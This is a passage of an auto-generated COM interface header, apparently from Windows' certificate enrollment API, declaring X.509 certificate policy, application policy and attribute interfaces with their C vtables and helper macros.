#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31f-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicies : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicies * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificatePolicies * This);
        
        END_INTERFACE
    } ICertificatePoliciesVtbl;

    interface ICertificatePolicies
    {
        CONST_VTBL struct ICertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicies_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificatePolicies_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificatePolicies_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificatePolicies_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificatePolicies_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificatePolicies_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__
#define __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionCertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionCertificatePolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab320-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionCertificatePolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionCertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionCertificatePolicies * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionCertificatePoliciesVtbl;

    interface IX509ExtensionCertificatePolicies
    {
        CONST_VTBL struct IX509ExtensionCertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionCertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionCertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionCertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionCertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionCertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionCertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionCertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionCertificatePolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionCertificatePolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionCertificatePolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionCertificatePolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionMSApplicationPolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionMSApplicationPolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab321-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionMSApplicationPolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionMSApplicationPoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionMSApplicationPoliciesVtbl;

    interface IX509ExtensionMSApplicationPolicies
    {
        CONST_VTBL struct IX509ExtensionMSApplicationPoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionMSApplicationPolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionMSApplicationPolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionMSApplicationPolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionMSApplicationPolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionMSApplicationPolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionMSApplicationPolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionMSApplicationPolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__ */


#ifndef __IX509Attribute_INTERFACE_DEFINED__
#define __IX509Attribute_INTERFACE_DEFINED__

/* interface IX509Attribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab322-217d-11da-b2a4-000e7bbb2b09")
    IX509Attribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attribute * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Attribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeVtbl;

    interface IX509Attribute
    {
        CONST_VTBL struct IX509AttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attribute_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Attribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Attribute_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attribute_INTERFACE_DEFINED__ */


#ifndef __IX509Attributes_INTERFACE_DEFINED__
#define __IX509Attributes_INTERFACE_DEFINED__

/* interface IX509Attributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attributes;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab323-217d-11da-b2a4-000e7bbb2b09")
    IX509Attributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Attribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attributes * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
